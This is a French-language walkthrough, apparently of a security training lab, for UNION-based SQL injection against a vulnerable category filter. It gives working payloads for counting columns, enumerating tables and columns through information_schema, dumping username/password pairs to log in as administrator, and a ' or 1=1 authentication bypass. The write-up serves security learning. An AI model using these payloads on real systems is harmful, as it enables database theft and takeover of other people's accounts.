Énumération de bases de données (non-Oracle)

Paramètre vulnérable : filtre category (injection via WHERE).
L’application renvoie les résultats SQL dans la réponse, permettant un UNION-based extraction.

Identifier le nom de la table contenant les identifiants, découvrir ses colonnes, extraire les paires username / password et se connecter en tant qu’administrator.

Déterminer le nombre de colonnes Exemple :
```
' ORDER BY 2-- -
' ORDER BY 3-- -
```
- Incrémenter l’indice jusqu’à provoquer une erreur → connaître le nombre de colonnes pour UNION.
Valider UNION SELECT Exemple (2 colonnes) :
```
' UNION SELECT '1','2'-- -
```
- Adapter aux N colonnes retournées (utiliser NULL pour colonnes non pertinentes).
Énumérer les tables (bases non-Oracle — information_schema)
```
' UNION SELECT NULL, table_name
  FROM information_schema.tables
  WHERE table_schema = 'public'-- -
```
- Permet de lister tables dans le schéma public (Postgres/MySQL compatible).
Énumérer les colonnes d’une table identifiée

' UNION SELECT NULL, column_name
  FROM information_schema.columns
  WHERE table_schema = 'public' AND table_name = 'users_arejzy'-- -

Exemple (colonnes identifiées password_qxbwwb, username_lidnwi) :

' UNION SELECT password_qxbwwb, username_lidnwi
  FROM users_arejzy-- -

Ajuster l’ordre/types de colonnes selon la requête vulnérable (utiliser CAST/CONCAT/NULL si besoin).

Une fois username = administrator et son password récupérés, se connecter via la page d’authentification.
Alternativement, utiliser un payload d’auth bypass si la table n’est pas directement accessible (ex. username = ' or 1=1-- -), mais l’exfiltration direct est préférable pour preuve.

Liste des noms de tables, colonnes, puis dump des credentials.
Connexion réussie en tant qu’administrator en utilisant les identifiants exfiltrés.

Compromission de comptes (escalade complète si admin), exfiltration d’informations sensibles, modification/suppression de données, extorsion possible.

Mis à jour il y a 2 mois

Ce contenu vous a-t-il été utile ?